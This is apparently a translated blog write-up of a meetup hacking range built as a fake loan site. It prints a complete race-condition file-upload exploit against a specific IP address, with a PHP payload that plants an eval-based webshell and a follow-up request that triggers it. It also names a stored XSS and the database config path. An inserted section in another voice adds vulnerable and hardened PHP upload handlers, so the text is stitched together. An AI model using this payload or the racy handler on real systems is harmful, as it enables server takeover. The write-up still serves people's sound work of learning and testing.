Filling the gap! Source code of the fake predatory-loan program released (limited time)


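0x01 Preface:

I wonder whether you still remember the target range that was made public during the final interactive session of HackingClub's first offline tech meetup.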


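After all the experts showed off their skills, a webshell was finally obtained two and a half hours later!

Afterwards, we opened the range environment to the public for a few days so everyone could play with it.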


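Then many people came to me asking for the source code of this program, so today I decided to release it!

0x02 Solution:

Following the hint, the upload point was found: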


After many attempts, it turned out to be a race-condition upload vulnerability:


Request contents:

POST /onup/upload.php HTTP/1.1
Host: 39.98.78.223
Content-Length: 266
Cache-Control: max-age=0
Origin: http://39.98.78.223
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryviDgu5MACkZpSdGS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://39.98.78.223/onup/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7
Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2
Connection: close

------WebKitFormBoundaryviDgu5MACkZpSdGS
Content-Disposition: form-data; name="file"; filename="file.php"
Content-Type: application/octet-stream

<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["test"])?>');?>
------WebKitFormBoundaryviDgu5MACkZpSdGS--

GET /onup/upload/file.php HTTP/1.1
Host: 39.98.78.223
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7
Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2
Connection: close

http://39.98.78.223/onup/upload/shell.php

Getshell
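
As an added example (not the range's code, which this post does not show): a typical shape of the race-condition upload bug named above, next to a hardened handler. The function names, the extension allow-list and the storage directory are assumptions made for illustration.

```php
<?php
// Added example, not the range's source. All names here are assumptions.
const ALLOWED_EXT = ['jpg', 'jpeg', 'png', 'gif'];

// Vulnerable pattern: the file is written into the web root under its
// client-supplied name first and only checked afterwards. Between
// move_uploaded_file() and unlink() the .php file is reachable and executable.
function upload_racy(array $file, string $webDir): bool
{
    $dest = $webDir . '/' . basename($file['name']);
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return false;
    }
    $ext = strtolower(pathinfo($dest, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        unlink($dest);          // too late: the window has already been open
        return false;
    }
    return true;
}

// Hardened pattern: validate while the upload is still in PHP's temp
// directory, then store it under a server-generated name outside the web root.
function upload_safe(array $file, string $storeDir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        return null;            // rejected before anything is written
    }
    // Check the content, not only the name: the MIME type is sniffed from bytes.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!in_array($mime, ['image/jpeg', 'image/png', 'image/gif'], true)) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // no client-chosen name
    if (!move_uploaded_file($file['tmp_name'], $storeDir . '/' . $name)) {
        return null;
    }
    return $name;               // serve later through a download script
}
```

With the hardened handler there is no moment at which a client-named .php file exists under the web root, so repeated requests have nothing to win. Disabling script execution for the upload directory in the web server configuration covers the case where a file lands there anyway.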


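0x03 Afterword:

In fact, without those restrictions there are other ways to solve it, so the stage is yours!

Go audit the code!

(Known: stored XSS)

(The database is in the root directory; the database configuration file is at WWWAppConfconfig.db.php)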


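0x04 Source code download:

Follow the official account and reply: 假冒贷款

to download the program source code!

(Limited to 24 hours! Please download as soon as possible! Please delete it within 24 hours of downloading! For learning purposes only)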





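This article was first published on the WeChat official account (弥天安全实验室): Filling the gap! Source code of the fake predatory-loan program released (limited time)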
